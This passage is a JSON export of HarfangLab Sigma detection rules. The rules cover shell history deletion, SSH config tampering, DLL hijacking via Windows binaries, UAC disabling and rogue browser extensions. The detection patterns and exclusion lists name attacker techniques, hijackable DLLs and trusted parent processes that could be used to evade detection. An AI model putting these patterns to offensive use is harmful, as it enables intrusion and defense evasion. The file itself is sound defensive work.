process.\nreferences:\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2022/11/25\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Deletion\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_binary1:\n Image:\n - '/bin/rm'\n - '/bin/unlink'\n - '/bin/dd'\n - '/usr/bin/truncate'\n\n selection_binary2:\n Image:\n - '/bin/cat'\n - '/bin/echo'\n CommandLine|contains: \">\"\n\n selection_commandline:\n CommandLine|contains:\n - '.bash_history'\n - 'fish_history'\n - '.history'\n - '.sh_history'\n - '.zhistory'\n - '.zsh_history'\n\n # /bin/rm /Users//.zsh_sessions/.historynew\n exclusion_zsh_sessions:\n Image: '/bin/rm'\n CommandLine|endswith: '.historynew'\n\n exclusion_cursor:\n - GrandparentImage: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin)'\n - ParentImage: '/Applications/Cursor.app/Contents/MacOS/Cursor'\n\n exclusion_vscode:\n ParentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n\n condition: (1 of selection_binary* and selection_commandline) and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb", "rule_name": "Shell History File Cleared (macOS)", "rule_description": "Detects the history file being removed.\nAttackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\nIt is recommended to investigate other malicious actions that may have been taken by the parent process.\n", "rule_creation_date": "2022-11-25", "rule_modified_date": "2025-04-08", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1070.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0e4aa7c9-6644-49db-905a-46646475b8a2", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-24T07:14:08.726662Z", "creation_date": "2026-03-23T11:45:35.297664Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.297668Z", "rule_level": "high", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1021/004/", "https://attack.mitre.org/techniques/T1563/001/", "https://attack.mitre.org/techniques/T1484/" ], "name": "t1021_004_ssh_server_config_modified_linux.yml", "content": "title: Suspicious Modification of the SSH Server Configuration\nid: 0e4aa7c9-6644-49db-905a-46646475b8a2\ndescription: |\n Detects an attempt to modify the SSH server configuration file, which contains security settings.\n Attackers may alter these settings to weaken security.\n It is recommended to review file changes by downloading the file through a job, check access permissions and assess risks from these changes.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/ssh/sshd_config'\n - TargetPath: '/etc/ssh/sshd_config'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_apk:\n - ProcessImage: '/sbin/apk'\n - ProcessParentImage: '/sbin/apk'\n - ProcessGrandparentImage: '/sbin/apk'\n - ProcessAncestors|contains: '|/usr/bin/apt|'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_denyhost_sshd:\n ProcessCommandLine|startswith: '/usr/bin/perl /usr/sbin/denyhost-sshd-plugin'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n exclusion_docker2:\n ProcessImage|endswith: '/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_puppet:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessParentImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|contains: '/usr/bin/puppet agent'\n\n exclusion_puppet2:\n ProcessParentCommandLine: 'puppet agent: applying configuration'\n\n exclusion_qradar:\n ProcessCommandLine|startswith: '/bin/bash /opt/qradar/bin/post-deploy.sh'\n\n exclusion_puppet3:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0e4aa7c9-6644-49db-905a-46646475b8a2", "rule_name": "Suspicious Modification of the SSH Server Configuration", "rule_description": "Detects an attempt to modify the SSH server configuration file, which contains security settings.\nAttackers may alter these settings to weaken security.\nIt is recommended to review file changes by downloading the file through a job, check access permissions and assess risks from these changes.\n", "rule_creation_date": "2022-11-07", "rule_modified_date": "2026-03-23", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.lateral_movement", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1021.004", "attack.t1484", "attack.t1563.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.088331Z", "creation_date": "2026-03-23T11:45:34.088333Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.088337Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_bootim.yml", "content": "title: DLL Hijacking via bootim.exe\nid: 0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1\ndescription: |\n Detects potential Windows DLL Hijacking via bootim.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bootim.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\BootMenuUX.DLL'\n - '\\bootux.dll'\n - '\\Cabinet.dll'\n - '\\dbghelp.dll'\n - '\\DismApi.DLL'\n - '\\FLTLIB.DLL'\n - '\\OLEACC.dll'\n - '\\PROPSYS.dll'\n - '\\ReAgent.dll'\n - '\\ResetEng.dll'\n - '\\tbs.dll'\n - '\\VirtDisk.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1", "rule_name": "DLL Hijacking via bootim.exe", "rule_description": "Detects potential Windows DLL Hijacking via bootim.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0e9afbf0-2bb7-4577-abdb-a763825ffb58", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.079662Z", "creation_date": "2026-03-23T11:45:34.079664Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.079668Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_applysettingstemplatecatalog.yml", "content": "title: DLL Hijacking via ApplySettingsTemplateCatalog.exe\nid: 0e9afbf0-2bb7-4577-abdb-a763825ffb58\ndescription: |\n Detects potential Windows DLL Hijacking via ApplySettingsTemplateCatalog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ApplySettingsTemplateCatalog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\activeds.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0e9afbf0-2bb7-4577-abdb-a763825ffb58", "rule_name": "DLL Hijacking via ApplySettingsTemplateCatalog.exe", "rule_description": "Detects potential Windows DLL Hijacking via ApplySettingsTemplateCatalog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0f267464-6531-4169-a033-e710c3cdd29b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.622596Z", "creation_date": "2026-03-23T11:45:34.622598Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.622602Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua", "https://attack.mitre.org/techniques/T1562/001/" ], "name": "t1562_001_disable_lua.yml", "content": "title: Limited User Account (LUA) Disabled\nid: 0f267464-6531-4169-a033-e710c3cdd29b\ndescription: |\n Detects Limited User Account (LUA, old name of UAC) being disabled.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process to determine whether this modification is legitimate.\nreferences:\n - https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-lua-settings-enablelua\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/12/21\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n # C:\\Windows\\system32\\deviceenroller.exe /o C636116F-52B6-470F-81BC-6D6E0D8D2FE6 /c /b\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_qqgame:\n ProcessOriginalFileName: 'qqgame.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Tencent Technology (Shenzhen) Company Limited'\n\n exclusion_wapt:\n ProcessImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains: '?:\\Windows\\CCM\\smsswd.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0f267464-6531-4169-a033-e710c3cdd29b", "rule_name": "Limited User Account (LUA) Disabled", "rule_description": "Detects Limited User Account (LUA, old name of UAC) being disabled.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process to determine whether this modification is legitimate.\n", "rule_creation_date": "2020-12-21", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1112", "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0f4fc753-a19b-44c4-aa32-f0c68a01a0ef", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.074982Z", "creation_date": "2026-03-23T11:45:34.074984Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.074989Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/", "https://attack.mitre.org/techniques/T1176/" ], "name": "t1176_chrome_extension_install.yml", "content": "title: Suspicious Chrome-based Browser Extension Installed\nid: 0f4fc753-a19b-44c4-aa32-f0c68a01a0ef\ndescription: |\n Detects the installation of an extension in the Chrome or Edge folder by an uncommon process based on the creation of the manifest.json file.\n Every extension must have a manifest.json file in its root directory that lists important information about the structure and behavior of that extension.\n Adversaries may manually install an extension in the browser folder for malicious purposes such as stealing credentials or injecting ads.\n It is recommended to check if the process at the origin of the manifest.json file creation has legitimate reason to do it and if the new extension is legitimate.\nreferences:\n - https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/09\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection_event:\n Kind:\n - 'create'\n - 'rename'\n selection_path:\n - Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - '?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - TargetPath:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n - '?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome*\\User Data\\\\*\\Extensions\\\\*\\manifest.json'\n\n exclusion_chrome:\n ProcessOriginalFileName: 'chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_edge:\n Image:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge SxS\\Application\\msedge.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSignature : 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_svchost:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService*'\n - '?:\\Windows\\System32\\svchost.exe -k secsvcs'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs -p -s SessionEnv'\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s ProfSvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_loadstate:\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n ProcessName: 'LoadState.exe'\n\n exclusion_copy:\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Windows'\n ProcessImage:\n - '?:\\Windows\\System32\\xcopy.exe'\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Windows\\syswow64\\Robocopy.exe'\n\n exclusion_oobe:\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessCommandLine: 